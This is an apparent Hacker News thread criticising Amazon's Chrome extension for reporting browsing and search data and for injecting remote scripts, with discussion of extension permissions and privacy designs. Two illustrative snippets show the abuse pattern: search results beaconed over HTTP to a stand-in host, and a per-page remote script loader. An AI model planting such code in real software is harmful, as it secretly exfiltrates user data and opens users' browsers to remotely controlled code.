This sort of abusive, insecure extension poisons the well for all extension developers. Now, I wish to submit a couple of feature requests to the Chrome team.
1) I wish there was a way by which an extension could declare its access patterns in a much more fine-grained manner (kinda like CORS headers). Then I could prove to my users that my extension cannot do the sort of ugly crap that Amazon is doing.
2) An API to expose details of an XMLHttpRequest's (or maybe even the 'document' object's) SSL server certificate. Even a binary blob will do: I can parse it in JS. Without this, you can't do "certificate pinning" in an extension.
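To illustrate the second request: the method name below is entirely hypothetical (no such API exists today), but if an XHR handed back the server certificate as raw DER bytes, pinning would be a few lines of ordinary JS:

    // Hypothetical sketch -- getServerCertificate() does not exist today.
    // Assume it returns the server certificate of a completed XHR as an
    // ArrayBuffer of DER bytes; pinning is then just a fingerprint check.
    var PINNED_SHA256 = '<hex SHA-256 fingerprint of the expected cert>';

    function sha256Hex(buffer) {
      return crypto.subtle.digest('SHA-256', buffer).then(function (digest) {
        return Array.prototype.map.call(new Uint8Array(digest), function (b) {
          return ('0' + b.toString(16)).slice(-2);
        }).join('');
      });
    }

    var xhr = new XMLHttpRequest();
    xhr.open('GET', 'https://api.example.com/config');
    xhr.onload = function () {
      var der = xhr.getServerCertificate(); // hypothetical API
      sha256Hex(der).then(function (fingerprint) {
        if (fingerprint !== PINNED_SHA256) {
          console.warn('Certificate does not match the pin; ignoring response');
          return;
        }
        // Only now do we trust xhr.responseText.
      });
    };
    xhr.send();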
Chrome extension permissions are too coarse-grained. Why is DOM write permission not separated from DOM read permission?
If Google doesn't crack down on abusive extensions like this, they risk users losing trust in the Chrome "brand". Just my 2 cents.
A way for users to restrict some of an app's permissions would be good, but it becomes a UX/support problem when they disable something that breaks core functionality.
That's for the extension devs to handle. I'm personally in favor of the following:
1) Users can enable or disable any permission they like
2) This is transparent to developers - i.e. if you ask for geolocation, you'll always get a location. It just won't be the right one if you don't have permission.
3) The extension is allowed to query which permissions I've given. So devs can handle blocked permissions more gracefully if they choose.
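For what it's worth, Chrome's optional-permissions API already gets partway to point 3 today. A minimal sketch of handling a withheld permission gracefully (the logging is a stand-in for whatever fallback the extension actually wants):

    // Ask Chrome which permissions we actually hold and degrade gracefully,
    // instead of assuming everything in the manifest was granted.
    chrome.permissions.contains({ permissions: ['geolocation'] }, function (granted) {
      if (granted) {
        navigator.geolocation.getCurrentPosition(function (pos) {
          console.log('Personalizing with location', pos.coords.latitude, pos.coords.longitude);
        });
      } else {
        console.log('Location withheld by the user; falling back to generic behaviour');
      }
    });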
Most extensions don't need much access, but this one does price comparisons as you browse. How else would it work unless it knows what you browse? Perhaps using activeTab could work; that might even be something I would use.
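Roughly what I have in mind (just a sketch, not the real extension's code): with only the activeTab permission, the extension can touch a page solely after you click its button on that page, instead of watching everything you browse.

    // Background-page sketch (manifest v2 era) relying only on "activeTab":
    // the page is touched only when the user clicks the extension's button.
    chrome.browserAction.onClicked.addListener(function (tab) {
      chrome.tabs.executeScript(tab.id, {
        // Grab the product title from the current page only; a real price
        // checker would then look that title up against its own backend.
        code: "document.title;"
      }, function (results) {
        console.log('Would run a price comparison for:', results && results[0]);
      });
    });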
At least these extensions are .js files that you can read, and Chrome does tell you what each one can access (and lets you see that after they're installed). A lot better than the situation for desktop software.
It's a surprise that there haven't been more exploits through major extensions - either by a malicious developer or a compromised repo - or maybe they just haven't been discovered yet.
I keep them mostly disabled - I just can't fathom why a simple extension (e.g. to pretty-print JSON) seems to need the access levels listed in the install warnings.
Chrome looks like a more and more insecure browser day by day. If the Chrome team just got their act together enough not to show saved passwords in clear text, I would say that would be a big win for all its unsuspecting users.
My paranoia about installing extensions is finally justified. If Amazon is pulling these kinds of stunts, then imagine the kind of mischief the smaller apps are pulling off.
This whole "scorched earth"-style permissions model that users can't make educated decisions about is what annoys me about current platforms like Chrome, Android and iOS.
JavaME had an interesting model where the app asks permissions after it is installed (e.g. internet access, local file system access) for each thing it wants to do. And the app has to consider the fact that the user can decide not to grant that particular permission. Of course, once you decide to trust the app, you could disable the prompts.
> where the app asks permissions after it is installed (e.g. internet access, local file system access) for each thing it wants to do
iOS does the same for the permissions it supports (access to photo library, contacts, GPS/location, twitter accounts, etc etc), but a lot of things are always allowed (such as internet access). Facebook also lets you deny specific permissions to apps on their platform. I've always wondered why Android and browser extensions don't let you veto individual permissions the same way.
> Facebook also lets you deny specific permissions to apps on their platform
Which, of course, is ironic given that every update to the Facebook app on Android asks for more and more permissions, to the point where it can do almost anything now.
The "news" part of this is that the extension allegedly reports all the URLs you've visited to amazon, including https ones, plus some reporting of site contents to alexa.
Which sort of shows what a farce this hullabaloo about information sharing is. "Megacorp promises not to share your information with other companies", but Megacorp owns dozens to hundreds of company-like projects anyway.
I think these agreements are in place so that if a malicious employee is hired and he accesses your data without authorization, they can fire the employee and be done. If their privacy policy said they wouldn't share the data, then they'd have to pay you damages. Since users aren't demanding actual privacy but do demand damages when they technically can, one would expect every company to write this sort of policy.
I believe that in the US (as opposed to the EEA) companies are allowed to share most non-sensitive data with affiliates and partners as long as they tell you that and provide an "Opt-Out" clause in their privacy statement. The default there is that data is shared unless you demand otherwise. If companies want to share sensitive data (medical info and the like) they also have to mention this in their privacy statement, but the clause there must be "Opt-In" instead, with the default being that data is not shared.
That's why, in my Chrome extension that lets you discover whether pages have been submitted to reddit as you browse [1], I was careful about the fact that the URLs are sent to reddit over HTTP.
It has a Privacy section in the settings that lets you enable Wait For Click so URLs are only checked upon explicit request. It also lets you exclude domains or URL regular expressions from automatically checking the URL, forcing those to be Wait for Click.
Plus, it comes with smart defaults. Default excluded domains include popular banks, Gmail and Google Docs. Default excluded regular expressions match Google/Yahoo/Bing SERPs and various protocols that you probably don't want checked.
All it takes are some smart defaults and a small amount of development [2], and you can protect your users' privacy. It's worth it.
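The gate itself is only a few lines. Roughly (the lists below are placeholders, not my actual defaults):

    // Sketch of the "should we auto-check this URL at all?" gate.
    var excludedDomains = ['mail.google.com', 'docs.google.com', 'www.mybank.example'];
    var excludedPatterns = [
      /^https?:\/\/www\.google\.[^\/]+\/search/i,  // search result pages
      /^(?!https?:)/i                              // any non-http(s) protocol
    ];

    function shouldAutoCheck(url) {
      var host;
      try {
        host = new URL(url).hostname;
      } catch (e) {
        return false; // unparsable URL: force Wait For Click
      }
      if (excludedDomains.indexOf(host) !== -1) return false;
      return !excludedPatterns.some(function (re) { return re.test(url); });
    }

    // Anything that fails the gate falls back to Wait For Click instead of
    // being checked automatically.
    console.log(shouldAutoCheck('https://mail.google.com/mail/u/0/')); // false
    console.log(shouldAutoCheck('http://example.com/article'));        // true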
Not sure if reddit supports it, but this is how we did our extension at an old startup I worked for.
We allowed users to share post-it-note-style comments on web sites with their friends; for example, I could leave you a little note on the hackernews front page, and the next time you went to the site you would see the note sitting on top of it.
In order to do this, we had to check every page you visited to see if there was a slide for you on it. We cared about privacy, so we took a hash of each URL and sent it instead of the URL itself. While we would know what site you are on if we happened to get a hit (i.e. you had a note on the page), we wouldn't know what site you were on if there was no note.
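The idea was roughly this (a sketch using today's Web Crypto API, not our original code): the server only ever receives a digest, and can only answer "is there a note for this digest?".

    // Send the server a digest of the URL rather than the URL itself.
    // notes.example.com is a placeholder endpoint for illustration.
    function hashUrl(url) {
      var bytes = new TextEncoder().encode(url);
      return crypto.subtle.digest('SHA-256', bytes).then(function (digest) {
        return Array.prototype.map.call(new Uint8Array(digest), function (b) {
          return ('0' + b.toString(16)).slice(-2);
        }).join('');
      });
    }

    hashUrl(location.href).then(function (digest) {
      // On a miss the digest tells the server nothing useful; on a hit it
      // already knows the page, because someone left a note there.
      fetch('https://notes.example.com/lookup?h=' + digest)
        .then(function (res) { return res.json(); })
        .then(function (notes) { console.log('Notes for this page:', notes); });
    });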
Of course, this was all based on the users trusting us to not change our code. There was nothing preventing us from changing how we sent the URLs. The level of access extensions get is SCARY. I don't think users realize what exactly they are allowing when they install them.
Hey, that's awesome! Your design reminds me of "hoodwink'd", which was "underground" in the sense that you had to edit your DNS settings for "hoodwink'd" to work. http://ecmanaut.blogspot.com/2006/01/hoodwinkd.html
Your URL-hashing system is also pretty close to how Goggles works, only instead of notes, you get to draw MS Paint-like scribbles. http://goggles.sneakygcr.net
Each website is uniquely keyed by a hash of the URL, so Goggles doesn't know the website's URL even when there is a hit. (It does send the page title to the server, though, because popular sites go on a leaderboard; I'm not so sure about that decision since it can leak some privacy...)
Browsers are doing a much better job at protecting/restricting bookmarklets than extensions, and I wish more of these kinds of note-taking apps/tricks used bookmarklets instead. For example, I just now discovered that Chrome will prevent Goggles from working on certain HTTPS sites like hacker news because it loads javascript from an http:// URL, which is a great design decision from the Chrome team.
I'm not exactly encouraged by Amazon's "fix": they simply started serving their custom spy instructions over https. It almost tempts me to write a different extension to observe these instructions and then crowd-source a database of them. What nefarious shit are they doing, that justifies this extra layer of indirection?
Read the article. The configuration from Amazon is only set up to gather HTTPS data on Amazon sites. Because the configuration was sent over HTTP, he used a man-in-the-middle attack to change it to a wildcard and gather all HTTPS data.
Amazon wasn't being evil, just incompetent. Never attribute to malice what can adequately be explained by stupidity...
So logging every single URL you visit and every search you make on Google isn't evil? This is the kind of nasty extension that your browser warns you about when you open a private/incognito window. I realize you were just talking about the HTTPS aspect of it, but your parent asked about the generic "this".
It's pretty clear they "might do this" so they can data-mine your browsing activity, which is now associated with your account, and serve you more targeted ads and product recommendations. So I guess we have to extend your catch-phrase with "...and never attribute to stupidity what can be adequately explained by greed."
> every single URL you visit and every search you make on Google isn't evil
No, it's not evil, it's the point of the extension -- to do product search.
If you don't like the product, you don't have to use it, but you can't say you want it, and then say it's evil for doing exactly what it says on the tin.
No, keep reading. It is more targeted than that. It sniffs the results of your Google searches, and sends the results over HTTP (not HTTPS) to Alexa. (See "It reports contents of certain websites you visit to Alexa".) It knows you are searching Google because they have a special whitelist that detects when you are visiting Google's URLs, even the encrypted ones.
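Mechanically it's nothing exotic, just a content script gated on a URL whitelist, roughly this shape (illustrative names and endpoint, not Amazon's actual code):

    // Illustration of the reported behaviour, not Amazon's actual code:
    // only fire on whitelisted search pages, then ship the scraped results
    // to a third-party endpoint over plain HTTP.
    var searchWhitelist = [/^https?:\/\/www\.google\.[^\/]+\/search/i];

    if (searchWhitelist.some(function (re) { return re.test(location.href); })) {
      var results = Array.prototype.map.call(
        document.querySelectorAll('h3 a'),  // rough selector for result links
        function (a) { return a.href; }
      );
      // The http:// scheme is the part that exposes an HTTPS search to
      // anyone on the network path.
      var beacon = new Image();
      beacon.src = 'http://metrics.example.com/collect?d=' +
                   encodeURIComponent(JSON.stringify(results.slice(0, 10)));
    }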
What about the script that they inject into every page you ever visit? It's completely useless - it contains an empty script and does nothing at all. What reason would they have to add this?
That simple empty script allows them, at any point in the future, to remotely inject scripts that'll have full permissions over any website you visit, without having to push an extension update or have it as part of their core extension code.
They can also choose to send it to specific individuals, or only for specific websites (their script URL gets the visited page as a query-string argument), making something like this extremely difficult to detect.
And of course, this could also be abused by someone who hacks their servers. He could, for example, inject a script that sends your username/password whenever you log in to a bank or PayPal.
Having remote code execute on every page you ever visit is either extremely stupid or an extremely smart way to spy on people without being detected. When the code is part of the extension itself and not remote, it 1) has to be signed (making abuse harder for a malicious hacker) and 2) can be more easily audited, since all users of the extension would get the "spying code" (making abuse harder for a malicious company).
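The whole mechanism fits in a few lines. Roughly this shape (a reconstruction of the pattern described above, not the extension's literal code):

    // A content script that runs on every page and pulls in a remote script,
    // passing the visited URL along as a query-string argument.
    var s = document.createElement('script');
    s.src = 'https://config.example.com/inject.js?url=' +
            encodeURIComponent(location.href);
    // Today the server returns an empty file. Tomorrow -- for everyone, for a
    // single user, or for a single target site -- it can return anything, and
    // that code runs with full access to the page without any extension update.
    document.documentElement.appendChild(s);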
Not entirely benign, but understandable: above all else, Amazon wants to know exactly what search results Google shows you for particular queries, so they can better understand Google's ranking policies.
They can't otherwise scrape search results as you, and getting the info as an anonymous user isn't nearly as valuable. So they need you, via an extension or toolbar, to (perhaps inadvertently) opt-in to letting them collect the data 'over your shoulder'.
Sadly, Amazon isn't alone in this. Chrome doesn't enforce a secure CSP on its extensions, and they don't require any sort of legitimate oversight, so I would venture to guess that there are at least a few dozen extensions that are just as bad.
I'd like to snoop on my (self initiated) https traffic so I can write a monitor for a third party web app that is only available over https. In a similar situation but with clear text, I've made use of a perl proxy that generates code mimicking the browser initiated transaction, which can then be lightly modified into a Nagios managed monitor for that kind of transaction.
The described technique looks like it might get me some of the way there, but it's kind of a square peg to my round hole. My google/stackoverflow searches aren't getting me very far; I found a reference to jmeter acting as an https client proxying http, but that looks like a similarly deep hole. Maybe it's easier than it looks; I don't know.
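One avenue I haven't fully explored, given what this thread shows extensions can see: a throwaway extension of my own with the webRequest permission (plus a host permission for the app) can at least log request/response metadata for my own HTTPS traffic. A rough sketch of the background script (it won't expose response bodies, so it may not be enough for the monitor):

    // Log metadata of my own HTTPS requests to the third-party app.
    // Requires "webRequest" and a matching host permission in the manifest;
    // the host below is a placeholder.
    chrome.webRequest.onCompleted.addListener(
      function (details) {
        console.log(details.method, details.url, '->', details.statusCode);
      },
      { urls: ['https://thirdparty.example.com/*'] }
    );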
I'm no browser expert, but I'm not particularly afraid of javascript.
I'm one of the Disconnect devs and these definitely aren't stupid questions:
1. Unlike that other "privacy" cough extension, Disconnect doesn't send any data (user or otherwise) to Disconnect servers. In other words, Disconnect doesn't output user data that can be intercepted by a MITM attack. Disconnect does grab a config file on startup (https://disconnect.me/help#syncing), but unlike in the Amazon case, the file is both transferred over HTTPS and encrypted (with the Stanford Javascript Crypto Library). Also unlike in the Amazon case, the file has a limited functional scope (which third-party sites to block) so is less susceptible to being rewritten in an abusive way.
2. One of our other Chrome extensions, Collusion for Chrome, will actually show you requests that are coming from other extensions. The more technical approach, which isn't that hard and I'd like to see more people try, is to run a packet sniffer (recommended: http://www.wireshark.org/) or proxy server (recommended: http://www.charlesproxy.com/).
I don't know of any, but I imagine there are a bunch on YouTube and so forth. I will say that of the two, Charles is the easier to use and I don't think too hard to figure out without any docs.
So if the user has Javascript disabled, what happens then?
It seems so many exploits rely on Javascript.
Would a user ever be willing to sacrifice a little "user experience" (accomplished with Javascript) for protection against easy exploits?
Is that question ever left to the user?
Not if a website provides no Javascript-free means of interacting with it and instead demands that the user enable Javascript (i.e. "you must enable Javascript to use this site").
In this case it doesn't matter too much if you disable Javascript, because extensions keep working. The disable-Javascript option only disables scripts in website content, not in extensions. So it will disable scripts injected into the pages, but scripts in extensions keep working.
Why is this a big surprise? I'm sure you would find similar features in the eBay extension or that of any other 3rd-party online store. The problem is really in how the permissions are displayed, and in how willing users are to give extensions full access to their browser.
The extension is available in the official Chrome Web Store. Apparently, Google doesn't verify extensions for malicious behavior – or maybe such behavior is even desired …
wow, i'm shocked that amazon would stoop so low. what's next, the yahoo toolbar stops being a convenient and secure way to search the web and gets into the spyware business?